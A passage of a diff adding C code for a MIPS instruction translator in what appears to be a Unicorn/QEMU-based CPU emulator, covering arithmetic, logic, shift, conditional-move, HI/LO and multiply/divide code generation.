tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "daddu"; + break; + case OPC_DSUB: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + gen_load_gpr(ctx, t2, rt); + tcg_gen_sub_tl(tcg_ctx, t0, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t2, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t1, t0, t1); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of different sign, first operand and result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + opn = "dsub"; + break; + case OPC_DSUBU: + if (rs != 0 && rt != 0) { + tcg_gen_sub_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_neg_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "dsubu"; + break; +#endif + case OPC_MUL: + if (likely(rs != 0 && rt != 0)) { + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "mul"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); +} + +/* Conditional move */ +static void gen_cond_move(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "cond move"; + TCGv t0, t1, t2; + + if (rd == 0) { + /* If no destination, treat it as a NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rt); + t1 = tcg_const_tl(tcg_ctx, 0); + t2 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t2, rs); + switch (opc) { + case OPC_MOVN: + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[rd], t0, t1, t2, *cpu_gpr[rd]); + opn = "movn"; + break; + case OPC_MOVZ: + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[rd], t0, t1, t2, *cpu_gpr[rd]); + opn = "movz"; + break; + case OPC_SELNEZ: + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[rd], t0, t1, t2, t1); + opn = "selnez"; + break; + case OPC_SELEQZ: + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[rd], t0, t1, t2, t1); + opn = "seleqz"; + break; + } + tcg_temp_free(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t0); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); +} + +/* Logic */ +static void gen_logic(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "logic"; + + if (rd == 0) { + /* If no destination, treat it as a NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + switch (opc) { + case OPC_AND: + if (likely(rs != 0 && rt != 0)) { + tcg_gen_and_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "and"; + break; + case OPC_NOR: + if (rs != 0 && rt != 0) { + tcg_gen_nor_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_not_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_not_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], ~((target_ulong)0)); + } + opn = "nor"; + break; + case OPC_OR: + if (likely(rs != 0 && rt != 0)) { + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "or"; + break; + case OPC_XOR: + if (likely(rs != 0 && rt != 0)) { + tcg_gen_xor_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "xor"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); +} + +/* Set on lower than */ +static void gen_slt(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "slt"; + TCGv t0, t1; + + if (rd == 0) { + /* If no destination, treat it as a NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + switch (opc) { + case OPC_SLT: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, *cpu_gpr[rd], t0, t1); + opn = "slt"; + break; + case OPC_SLTU: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, *cpu_gpr[rd], t0, t1); + opn = "sltu"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +/* Shifts */ +static void gen_shift(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "shifts"; + TCGv t0, t1; + + if (rd == 0) { + /* If no destination, treat it as a NOP. + For add & sub, we must generate the overflow exception when needed. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + switch (opc) { + case OPC_SLLV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); + tcg_gen_shl_tl(tcg_ctx, t0, t1, t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], t0); + opn = "sllv"; + break; + case OPC_SRAV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); + tcg_gen_sar_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "srav"; + break; + case OPC_SRLV: + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); + tcg_gen_shr_tl(tcg_ctx, t0, t1, t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], t0); + opn = "srlv"; + break; + case OPC_ROTRV: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_andi_i32(tcg_ctx, t2, t2, 0x1f); + tcg_gen_rotr_i32(tcg_ctx, t2, t3, t2); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t2); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + opn = "rotrv"; + } + break; +#if defined(TARGET_MIPS64) + case OPC_DSLLV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); + tcg_gen_shl_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "dsllv"; + break; + case OPC_DSRAV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); + tcg_gen_sar_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "dsrav"; + break; + case OPC_DSRLV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); + tcg_gen_shr_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "dsrlv"; + break; + case OPC_DROTRV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); + tcg_gen_rotr_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "drotrv"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +/* Arithmetic on HI/LO registers */ +static void gen_HILO(DisasContext *ctx, uint32_t opc, int acc, int reg) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGv **cpu_HI = (TCGv **)tcg_ctx->cpu_HI; + TCGv **cpu_LO = (TCGv **)tcg_ctx->cpu_LO; + const char *opn = "hilo"; + + if (reg == 0 && (opc == OPC_MFHI || opc == OPC_MFLO)) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + if (acc != 0) { + check_dsp(ctx); + } + + switch (opc) { + case OPC_MFHI: +#if defined(TARGET_MIPS64) + if (acc != 0) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[reg], *cpu_HI[acc]); + } else +#endif + { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[reg], *cpu_HI[acc]); + } + opn = "mfhi"; + break; + case OPC_MFLO: +#if defined(TARGET_MIPS64) + if (acc != 0) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[reg], *cpu_LO[acc]); + } else +#endif + { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[reg], *cpu_LO[acc]); + } + opn = "mflo"; + break; + case OPC_MTHI: + if (reg != 0) { +#if defined(TARGET_MIPS64) + if (acc != 0) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], *cpu_gpr[reg]); + } else +#endif + { + tcg_gen_mov_tl(tcg_ctx, *cpu_HI[acc], *cpu_gpr[reg]); + } + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_HI[acc], 0); + } + opn = "mthi"; + break; + case OPC_MTLO: + if (reg != 0) { +#if defined(TARGET_MIPS64) + if (acc != 0) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], *cpu_gpr[reg]); + } else +#endif + { + tcg_gen_mov_tl(tcg_ctx, *cpu_LO[acc], *cpu_gpr[reg]); + } + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_LO[acc], 0); + } + opn = "mtlo"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s", opn, regnames[reg]); +} + +static inline void gen_r6_ld(DisasContext *ctx, target_long addr, int reg, int memidx, + TCGMemOp memop) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv t0 = tcg_const_tl(tcg_ctx, addr); + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, memidx, memop); + gen_store_gpr(tcg_ctx, t0, reg); + tcg_temp_free(tcg_ctx, t0); +} + +static inline void gen_pcrel(DisasContext *ctx, int rs, int16_t imm) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + target_long offset; + target_long addr; + + switch (MASK_OPC_PCREL_TOP2BITS(ctx->opcode)) { + case OPC_ADDIUPC: + if (rs != 0) { + offset = sextract32(ctx->opcode << 2, 0, 21); + addr = addr_add(ctx, ctx->pc, offset); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rs], addr); + } + break; + case R6_OPC_LWPC: + offset = sextract32(ctx->opcode << 2, 0, 21); + addr = addr_add(ctx, ctx->pc, offset); + gen_r6_ld(ctx, addr, rs, ctx->mem_idx, MO_TESL); + break; +#if defined(TARGET_MIPS64) + case OPC_LWUPC: + check_mips_64(ctx); + offset = sextract32(ctx->opcode << 2, 0, 21); + addr = addr_add(ctx, ctx->pc, offset); + gen_r6_ld(ctx, addr, rs, ctx->mem_idx, MO_TEUL); + break; +#endif + default: + switch (MASK_OPC_PCREL_TOP5BITS(ctx->opcode)) { + case OPC_AUIPC: + if (rs != 0) { + offset = ((target_ulong)imm) << 16; + addr = addr_add(ctx, ctx->pc, offset); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rs], addr); + } + break; + case OPC_ALUIPC: + if (rs != 0) { + offset = ((target_ulong)imm) << 16; + addr = ~0xFFFF & addr_add(ctx, ctx->pc, offset); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rs], addr); + } + break; +#if defined(TARGET_MIPS64) + case R6_OPC_LDPC: /* bits 16 and 17 are part of immediate */ + case R6_OPC_LDPC + (1 << 16): + case R6_OPC_LDPC + (2 << 16): + case R6_OPC_LDPC + (3 << 16): + check_mips_64(ctx); + offset = sextract32(ctx->opcode << 3, 0, 21); + addr = addr_add(ctx, (ctx->pc & ~0x7), offset); + gen_r6_ld(ctx, addr, rs, ctx->mem_idx, MO_TEQ); + break; +#endif + default: + MIPS_INVAL("OPC_PCREL"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + } +} + +static void gen_r6_muldiv(DisasContext *ctx, int opc, int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "r6 mul/div"; + TCGv t0, t1; + + if (rd == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + + switch (opc) { + case R6_OPC_DIV: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_ext32s_tl(tcg_ctx, t1, t1); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_div_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "div"; + break; + case R6_OPC_MOD: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_ext32s_tl(tcg_ctx, t1, t1); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_rem_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "mod"; + break; + case R6_OPC_DIVU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_divu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "divu"; + break; + case R6_OPC_MODU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_remu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "modu"; + break; + case R6_OPC_MUL: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_mul_i32(tcg_ctx, t2, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t2); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "mul"; + break; + case R6_OPC_MUH: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t3); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "muh"; + break; + case R6_OPC_MULU: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_mul_i32(tcg_ctx, t2, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t2); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "mulu"; + break; + case R6_OPC_MUHU: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t3); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "muhu"; + break; +#if defined(TARGET_MIPS64) + case R6_OPC_DDIV: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1ULL << 63); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_div_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "ddiv"; + break; + case R6_OPC_DMOD: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1ULL << 63); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_rem_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "dmod"; + break; + case R6_OPC_DDIVU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_divu_i64(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "ddivu"; + break; + case R6_OPC_DMODU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_remu_i64(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "dmodu"; + break; + case R6_OPC_DMUL: + tcg_gen_mul_i64(tcg_ctx, *cpu_gpr[rd], t0, t1); + opn = "dmul"; + break; + case R6_OPC_DMUH: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + tcg_gen_muls2_i64(tcg_ctx, t2, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t2); + } + opn = "dmuh"; + break; + case R6_OPC_DMULU: + tcg_gen_mul_i64(tcg_ctx, *cpu_gpr[rd], t0, t1); + opn = "dmulu"; + break; + case R6_OPC_DMUHU: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + tcg_gen_mulu2_i64(tcg_ctx, t2, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t2); + } + opn = "dmuhu"; + break; +#endif + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s %s", opn, regnames[rs], regnames[rt]); + out: + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_muldiv(DisasContext *ctx, uint32_t opc, + int acc, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_HI = (TCGv **)tcg_ctx->cpu_HI; + TCGv **cpu_LO = (TCGv **)tcg_ctx->cpu_LO; + const char *opn = "mul/div"; + TCGv t0, t1; + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + + if (acc != 0) { + check_dsp(ctx); + } + + switch (opc) { + case OPC_DIV: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_ext32s_tl(tcg_ctx, t1, t1); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_div_tl(tcg_ctx, *cpu_LO[acc], t0, t1); + tcg_gen_rem_tl(tcg_ctx, *cpu_HI[acc], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], *cpu_LO[acc]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], *cpu_HI[acc]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "div"; + break; + case OPC_DIVU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_divu_tl(tcg_ctx, *cpu_LO[acc], t0, t1); + tcg_gen_remu_tl(tcg_ctx, *cpu_HI[acc], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], *cpu_LO[acc]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], *cpu_HI[acc]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "divu"; + break; + case OPC_MULT: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_LO[acc], t2); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_HI[acc], t3); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "mult"; + break; + case OPC_MULTU: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_LO[acc], t2); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_HI[acc], t3); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "multu"; + break; +#if defined(TARGET_MIPS64) + case OPC_DDIV: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1ULL << 63); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_div_tl(tcg_ctx, *cpu_LO[acc], t0, t1); + 